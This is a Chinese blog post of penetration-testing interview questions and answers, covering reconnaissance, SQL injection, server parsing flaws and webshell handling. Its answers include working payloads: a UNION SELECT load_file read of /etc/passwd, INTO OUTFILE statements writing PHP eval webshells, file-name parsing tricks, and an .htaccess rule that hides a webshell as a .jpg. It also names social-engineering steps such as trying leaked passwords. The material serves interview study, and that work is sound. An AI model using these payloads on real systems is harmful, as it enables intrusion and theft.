黑客渗透知识点总结

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 黑客渗透知识点总结

640.png

目录


渗透测试工程师面试题大全


知孤云出岫 整理


  • 1.拿到一个待检测的站,你觉得应该先做什么?


  • 2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?


  • 3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?


  • 4.判断出网站的 CMS 对渗透有什么意义?


  • 5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?


  • 6.常见的网站服务器容器?


  • 7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?


  • 8.目前已知哪些版本的容器有解析漏洞,具体举例?


  • 9、如何手工快速判断目标站是 windows 还是 linux 服务器?


  • 10.为何一个 mysql 数据库的站,只有一个 80 端口开放?


  • 11.3389 无法连接的几种情况?


  • 12.在某后台新闻编辑界面看到编辑器,应该先做什么?


  • 13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?


  • 14.注入漏洞只能查账号密码?





1.拿到一个待检测的站,你觉得应该先做什么?

       收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...


2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

       5.0 以下没有 information_schema 这个系统表,无法列表名等,只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操做。


3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

 (1)丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台

 (2)用邮箱做关键词进行丢进搜索引擎

 (3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

 (4)社工找出社交账号,里面或许会找出管理员设置密码的习惯

 (5)利用已有信息生成专用字典

(6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西

4.判断出网站的 CMS 对渗透有什么意义?

       查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

       (1)敏感文件、二级目录扫描


       (2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点


6.常见的网站服务器容器?

       IIS、Apache、nginx、Tomcat,weblogic、jboss


7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

root 权限以及网站的绝对路径load_file()读取文件操作


前提:


知道文件的绝对路径能够使用union 查询


对 web 目录有写的权限


union select 1,load_file('/etc/passwd'),3,4,5# 0x2f6574632f706173737764


          union select 1,load_file(0x2f6574632f706173737764),3,4,5# 路径没有加单引号的话  必须转换十六进制


要是想省略单引号的话必须转换十六进制into outfile 写入文件操作


前提:


文件名必须是全路径(绝对路径) 用户必须有写文件的权限


没有对单引号'过滤


select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php' select '<?php @eval($_POST["admin"]); ?>' into outfile


'C:\Windows\tmp\8.php'


路径里面两个反斜杠\可以换成一个正斜杠/


PHP 语句没有单引号的话,必须转换成十六进制要是想省略单引号'的话,必须转换成十六进制


<?php eval($_POST["admin"]); ?> 或 者 <?php eval($_GET["admin"]); ?>


<?php @eval($_POST["admin"]); ?>


<?php phpinfo(); ?>


<?php eval($_POST["admin"]); ?>


建议一句话 PHP 语句转换成十六进制


8.目前已知哪些版本的容器有解析漏洞,具体举例?

   (1)IIS 6.0


/xx.asp/xx.jpg "xx.asp"是文件夹名


(2) IIS 7.0/7.5


默认 Fast-CGI 开启,直接在 url 中图片地址后面输入/1.php,会把正常图片当成 php 解析


  (3)Nginx


  版本小于等于 0.8.37,利用方法和 IIS 7.0/7.5 一样,Fast-CGI 关闭情况下也可利用。


空字节代码 xxx.jpg.php


  (4)Apache


上传的文件命名为:test.php.x1.x2.x3,Apache 是从右往左判断后缀


(5)lighttpd xx.jpg/xx.php


9、如何手工快速判断目标站是 windows 还是 linux 服务器?

linux 大小写敏感,windows 大小写不敏感


10.为何一个 mysql 数据库的站,只有一个 80 端口开放?

更改了端口,没有扫描出来

站库分离

3306 端口不对外开放

11.3389 无法连接的几种情况?

(1)没开放 3389 端口

(2)端口被修改


    (3)防护拦截

    (4)处于内网(需进行端口转发)


12.在某后台新闻编辑界面看到编辑器,应该先做什么?

       查看编辑器的名称版本,然后搜索公开的漏洞

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

能做的事情很多,用隐藏网马来举例子:


插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php


</FilesMatch>


.jpg 文件会被解析成.php 文件

14.注入漏洞只能查账号密码?

       可脱裤,可上传 webshell,可执行命令


微信图片_20240318154345.png

相关文章
|
6月前
|
安全 网络协议 网络安全
网安面试指南——(渗透,攻击,防御)
网安面试指南——(渗透,攻击,防御)
160 2
|
3月前
|
SQL 安全 算法
网络安全的盾牌与剑:漏洞防御与加密技术的深度剖析
【8月更文挑战第27天】在数字世界的海洋中,网络安全是航行者不可或缺的罗盘和船锚。本文将深入探索网络安全的两大支柱——防御漏洞和加密技术,揭示它们如何成为保护信息安全的关键。通过分析最新的安全威胁、探讨加密算法的原理,以及提升个人和组织的网络安全意识,我们旨在为读者提供一套实用的网络安全策略。无论你是IT专家还是日常互联网用户,这篇文章都将为你的安全之旅指引方向。
|
4月前
|
安全 Linux 网络安全
自学黑客(网络安全)
【7月更文挑战第18天】
73 5
|
4月前
|
安全 测试技术 网络安全
探索自动化测试:从理论到实践网络防御的盾牌与剑:漏洞解析与加密技术实战
【7月更文挑战第31天】在软件工程领域,自动化测试是确保产品质量和提升开发效率的关键工具。本文将深入探讨自动化测试的核心概念、优势以及面临的挑战,并通过一个具体的代码示例来展示如何在实际项目中实施自动化测试。我们将看到,通过采用恰当的策略和技术,自动化测试不仅能够提高测试覆盖率,还可以缩短反馈周期,从而加速迭代速度。 【7月更文挑战第31天】在数字世界的无垠战场上,网络安全和信息安全是守护数据宝藏的盾牌与剑。本文将深入探讨网络安全的脆弱点,揭示加密技术的奥秘,并唤醒每一位数字时代居民的安全意识。通过代码示例和案例分析,我们将一起穿梭在信息的海洋中,学习如何铸造坚不可摧的防御,以及如何运用高超
66 0
|
安全 网络安全 数据安全/隐私保护
花无涯带你走进黑客世界15 社会工程学攻击工具
世界第一黑客凯文•米特尼克的书中曾提到,人为因素才是安全的软肋。很多公司在信息安全上投入重金,最终导致数据泄露的原因却在人本身。你可能想象不到,对黑客来说,通过网络远程渗透破解获得数据,可能是最为麻烦的方法。一种无需电脑网络,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学攻击,建议每个小白都应该系统的学习网络安全黑客秘籍。
148 1
|
Go 数据安全/隐私保护
某教程学习笔记(一):21、后渗透攻击
某教程学习笔记(一):21、后渗透攻击
132 0
某教程学习笔记(一):21、后渗透攻击
|
安全 Shell 应用服务中间件
|
安全 网络协议 Ubuntu
|
安全 网络安全
黑客渗透测试用社会工程学的奥秘
黑客往往对世界有自己独特的视角。当恶意攻击无法通过纯粹的计算机技术达到目的时,高超的情商将取代智商成为进一步打开突破口的武器,研究这些恶意攻击的安全人员也将跟进这些特殊而神秘的手段,从而在长期内形成安全领域独树一帜的理论:社会工程学(SocialEngineering)。本章将带读者揭开社会工程学的奥秘,欣赏它的风采,并介绍一些社会工程学的常用技巧。如果将这些技能运用到日常生活中,也能帮助你在学习、生活、工作中获得一些意想不到的优势。
210 0
黑客渗透测试用社会工程学的奥秘
|
SQL 安全 搜索推荐
渗透测试之sql注入延伸手法的攻与防
几年前,SQL注入在世界范围内很流行,但现在,SQL注入仍然是最流行的攻击方法之一,开发人员为此头疼。当然主要是因为注入攻击的灵活性,一个目的,多条语句,多种编写方法。SQL注入可以分为工具和手工两种。由于自动化,工具通常比手动注入效率高得多,但与手动注入相比,它们受到限制,因为它们没有针对性。
5268 0
渗透测试之sql注入延伸手法的攻与防